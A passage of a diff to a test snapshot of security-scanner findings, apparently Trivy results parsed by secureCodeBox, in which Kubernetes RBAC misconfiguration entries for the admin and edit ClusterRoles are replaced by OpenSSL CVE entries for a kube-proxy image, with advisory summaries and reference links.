"https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", + "category": "Vulnerability", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 